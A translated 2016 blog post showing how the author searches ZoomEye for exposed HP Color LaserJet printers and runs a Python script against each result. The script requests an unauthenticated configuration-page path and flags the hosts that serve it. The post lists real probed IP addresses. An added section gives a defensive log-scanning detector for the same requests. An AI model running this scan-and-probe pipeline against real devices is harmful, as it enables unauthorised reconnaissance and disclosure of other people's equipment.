
ZoomEye + Seebug: The Power of a Radar-and-Artillery Twin Engine

Posted: 2016-04-30 15:31:44


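  Everyone is surely familiar with ZoomEye. If not, you surely know Shodan. And if not that, you surely know Google. Otherwise you really shouldn't be reading this article. LOL, just kidding. That said, after all this you probably have a rough idea of what ZoomEye is. If you don't, please look it up on Baidu. I'll wait for you to come back~

  Enough chatter. What are we actually doing today? Let the show begin.

  For a highly confidential task, I wrote an SDK for the ZoomEye API. I had also just written a plugin on Seebug, one that detects a vulnerability in an IoT device. Then I got stuck looking for sites to test the plugin against. I simply could not find any.

  Wait, didn't you say ZoomEye is so powerful?

  That's right!!!

  That is exactly what I used: my own SDK together with the open API. Next: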

  

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
# zoomeye.zoomeye is the author's own SDK wrapper around the ZoomEye API
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'
password = 'your zoomeye account password'

# Log in and obtain an API access token
token = test.logIn(username, password)

  And just like that, I am logged in to ZoomEye. What? You say you don't believe me?

  

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'
password = 'your ZoomEye account password'

token = test.logIn(username, password)

# Search the "web" index, first page, with facets on app and os
result = test.search('web', query='HP Color LaserJet', page=1, facets='app,os')

print(result)

  Tell me, what do you see?

  Don't you suddenly feel adorable~

  Then I wrote a script like this.

   

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = 'your main@qq.com'
password = 'your ZoomEye account password'

token = test.logIn(username, password)

result = test.search('web', query='HP Color LaserJet', page=1, facets='app,os')

target = []

# Collect the first address of every match in the search result
for i in result:
    for x in i['matches']:
        print(x['ip'])
        target.append(x['ip'][0])

for ip in target:
    try:
        payload = '/hp/device/InternalPages/Index?id=ConfigurationPage'
        url = 'http://' + ip + payload
        res_exp = requests.get(url, timeout=10)
        print('[-]checking url %s' % url)
        # The configuration page is considered exposed when both markers appear
        # (.text is used so the substring test works on decoded text)
        if res_exp.status_code == 200 and 'HomeDeviceName' in res_exp.text and 'HomeDeviceIp' in res_exp.text:
            print('[+]%s is vul' % url)
        elif res_exp.status_code != 200:
            # Non-200 response: the page was not served
            print('[+]%s is static' % url)
        else:
            pass

    except requests.RequestException:
        # Unreachable host or timeout: skip it
        pass

  And the result looked like this:

   

[-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage
[-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static

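  Totally useless ~_~

  On to the next page: change the page parameter.

  Because of my account tier, a limit policy applies here. When I changed page to 2, the result was: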

{u'url': u'https://www.zoomeye.org/api/doc#limitations', u'message': u'account was suspend, excceeding the 30% of total (7.5)', u'error': u'suspended'}

  Then I tried the web version. After persistent effort,

  finally:

https://xxxxx/hp/device/InternalPages/Index?id=ConfigurationPage is vul

  The plugin has been submitted to Seebug.
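
  Seen from the defender's side, the check above leaves a recognisable request in any proxy or gateway log that sits in front of the printers. The following is an added example, not code from the original post: it scans access-log lines for requests to the configuration page path and reports which sources were actually served it. The combined log format, the function names and the sample lines (documentation address ranges, constructed) are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Path and id value requested by the script in the post (compared lowercased).
PROBE_PATH = "/hp/device/internalpages/index"
PROBE_ID = "configurationpage"

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = """
203.0.113.7 - - [30/Apr/2016:15:02:11 +0800] "GET /hp/device/InternalPages/Index?id=ConfigurationPage HTTP/1.1" 200 18234 "-" "python-requests/2.9.1"
198.51.100.23 - - [30/Apr/2016:15:02:15 +0800] "GET /hp/device/internalpages/index?id=Configuration%50age HTTP/1.1" 403 512 "-" "python-requests/2.9.1"
192.0.2.10 - - [30/Apr/2016:15:03:40 +0800] "GET /hp/device/InternalPages/Index?id=OtherPage HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.0.2.10 - - [30/Apr/2016:15:04:02 +0800] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

def is_probe(target):
    """True if the request target is the configuration page, ignoring
    case and percent-encoding so trivial variants still match."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return False
    path = unquote(parts.path).lower().rstrip("/")
    ids = [v.lower() for v in parse_qs(parts.query).get("id", [])]
    return path == PROBE_PATH and PROBE_ID in ids

def find_probes(lines):
    """Map source address -> [(timestamp, status), ...] for probe requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe(m.group("target")):
            hits[m.group("src")].append((m.group("ts"), int(m.group("status"))))
    return dict(hits)

def served_sources(hits):
    """Sources that received a 200, i.e. the page was disclosed to them."""
    return sorted(s for s, ev in hits.items() if any(c == 200 for _, c in ev))

if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG.strip().splitlines())
    for src, events in hits.items():
        print(src, events)
    print("served:", served_sources(hits))
```

  A source listed by served_sources() received the configuration page without authentication, which is the condition the script in the post reports as "is vul".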

   

   

   

  


Original article: http://www.cnblogs.com/magic-zero/p/5448725.html
